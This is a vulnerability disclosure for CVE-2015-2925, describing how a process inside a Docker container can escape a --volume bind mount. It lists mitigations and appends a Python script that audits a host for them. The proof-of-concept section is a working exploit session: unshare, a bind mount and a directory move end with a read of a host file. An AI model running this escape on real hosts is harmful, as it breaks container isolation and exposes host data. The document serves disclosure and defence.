# Docker + CVE-2015-2925 = escaping from --volume

[Recent vulnerability in Linux](http://www.openwall.com/lists/oss-security/2015/04/03/7), known for about half a year (several months publicly), made it possible to escape from bind mounts. In particular, in the case of Docker it is possible to escape from inside a directory mounted via the `--volume` option into the host's filesystem.

The Docker Security Team [is already aware](http://www.openwall.com/lists/oss-security/2015/05/07/10) of the issue and allowed this to be published in order to attract public attention.

Thanks to [Jann Horn](https://github.com/thejh) for pointing this out; basically I just reproduced it.

## Mitigation

Any of these will be sufficient:

* AppArmor-enabled kernel and AppArmor Docker profile
* SELinux-enabled kernel and SELinux Docker policy
* User namespaces disabled in the kernel

## Notes

* This is not fixed upstream or in distros yet and should work on any recent kernel
* This doesn't require root inside the container
* Distros provide different versions of the util-linux package, of which unshare(1) is part, and it might return "Operation not permitted" in your case; the package from Debian Jessie was tested to work as expected

## Proof of concept

```
# uname -r
3.18.9-aufs
# zgrep USER_NS /proc/config.gz
CONFIG_USER_NS=y
# docker -v
Docker version 1.6.1, build 97cd073
# docker pull debian:jessie
# mkdir /test && chmod 777 /test
# echo escaped > /etc/hostdata && chmod 644 /etc/hostdata
# docker run -i -t --rm -v /test:/test -u nobody debian:jessie
nobody@fc8925af0f19:/$ unshare -m -U -r /bin/bash
root@fc8925af0f19:/# cd /test
root@fc8925af0f19:/test# mkdir A A/B C D
root@fc8925af0f19:/test# mount --bind A D
root@fc8925af0f19:/test# cd D/B
root@fc8925af0f19:/test/D/B# mv /test/A/B /test/C
root@fc8925af0f19:/test/D/B# cat ../../../etc/hostdata
escaped
```
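The following host audit script is an added example and not code from this repository. It turns the Mitigation section into a check: the host counts as covered when at least one of the three listed mitigations is in place, and as exposed when `CONFIG_USER_NS=y` (the precondition the proof of concept relies on) and neither AppArmor nor SELinux confines Docker. The sysfs/procfs paths and the `docker-default` profile name are assumptions about a typical Linux host, not facts from the README; the sample inputs in the test are constructed.

```python
"""Audit a host for the CVE-2015-2925 mitigations listed in the README.

Added example, not code from the original repository. The host is treated as
covered when at least one of the README's three mitigations is in place. The
paths below and the "docker-default" profile name are assumptions about a
typical Linux host, not facts taken from the README.
"""
import gzip
import sys

# Assumed locations on a typical Linux host (not from the README).
KERNEL_CONFIG = "/proc/config.gz"
APPARMOR_ENABLED = "/sys/module/apparmor/parameters/enabled"   # "Y" or "N"
APPARMOR_PROFILES = "/sys/kernel/security/apparmor/profiles"   # "name (mode)" per line
SELINUX_ENFORCE = "/sys/fs/selinux/enforce"                    # "1" enforcing, "0" permissive
DOCKER_PROFILE = "docker-default"  # assumed name of Docker's AppArmor profile


def user_ns_enabled(config_text):
    """True if the kernel config contains CONFIG_USER_NS=y (the PoC's precondition)."""
    return any(line.strip() == "CONFIG_USER_NS=y" for line in config_text.splitlines())


def apparmor_covers_docker(enabled_text, profiles_text):
    """True if AppArmor is on and a profile named DOCKER_PROFILE is loaded."""
    if enabled_text is None or enabled_text.strip() != "Y":
        return False
    if profiles_text is None:
        return False
    # Each line of the profiles file looks like "docker-default (enforce)".
    return any(line.split(" (")[0].strip() == DOCKER_PROFILE
               for line in profiles_text.splitlines())


def selinux_enforcing(enforce_text):
    """True if SELinux is present and in enforcing mode."""
    return enforce_text is not None and enforce_text.strip() == "1"


def assess(config_text, apparmor_enabled_text, apparmor_profiles_text, selinux_enforce_text):
    """Return (mitigated, reasons) listing which README mitigations apply.

    A None input means "could not read", which never counts as a mitigation.
    An empty reasons list means no mitigation could be confirmed.
    """
    reasons = []
    if config_text is not None and not user_ns_enabled(config_text):
        reasons.append("user namespaces disabled (CONFIG_USER_NS not set)")
    if apparmor_covers_docker(apparmor_enabled_text, apparmor_profiles_text):
        reasons.append("AppArmor enabled with %s profile loaded" % DOCKER_PROFILE)
    if selinux_enforcing(selinux_enforce_text):
        reasons.append("SELinux enforcing")
    return bool(reasons), reasons


def read_text(path, gz=False):
    """Read a small text file, returning None if it is absent or unreadable."""
    try:
        opener = gzip.open if gz else open
        with opener(path, "rt") as fh:
            return fh.read()
    except OSError:
        return None


def main():
    mitigated, reasons = assess(read_text(KERNEL_CONFIG, gz=True),
                                read_text(APPARMOR_ENABLED),
                                read_text(APPARMOR_PROFILES),
                                read_text(SELINUX_ENFORCE))
    if mitigated:
        print("covered: " + "; ".join(reasons))
        return 0
    print("NOT covered: no confirmed mitigation (check CONFIG_USER_NS, AppArmor, SELinux)")
    return 1


if __name__ == "__main__":
    sys.exit(main())
```

On kernels built without `/proc/config.gz`, point `KERNEL_CONFIG` at the distro's copy (commonly `/boot/config-$(uname -r)`, read without gzip). The script only confirms that a Docker AppArmor profile is loaded or that SELinux is enforcing; it does not verify that the containers actually run under that profile or policy, so treat "covered" as a necessary check, not a complete one.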